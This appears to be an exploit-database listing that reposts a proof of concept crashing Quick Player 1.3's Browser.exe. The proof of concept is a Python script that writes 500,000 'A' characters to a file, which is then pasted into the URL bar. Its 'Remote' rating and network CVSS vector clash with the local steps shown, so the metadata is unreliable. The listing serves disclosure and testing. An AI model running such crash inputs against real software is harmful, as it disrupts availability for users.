Advertisement






Quick Player 1.3 Denial Of Service

CVE Category Price Severity
CVE-2019-1610 CWE-400 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-06-06
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060030

Below is a copy:

Quick Player 1.3 Denial Of Service
# Exploit Title: Quick Player 1.3 - 'Browser.exe' Denial of Service
# Date: 06/05/2020
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html
# Version: 1.3
# Tested on: Windows 7

# Proof of Concept:

# 1.- Run the python script "poc.py", it will create a new file "poc.txt"

# 2.- Open the application "Browser.exe"

# 3.- Paste the contents of "poc.txt" within the url bar

# 4.- Crashed

# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Quick-Player-Browser-dos/
# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings7/2.gif 

buffer = "A" * 500000

f = open ("poc.txt", "w")

f.write(buffer)

f.close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum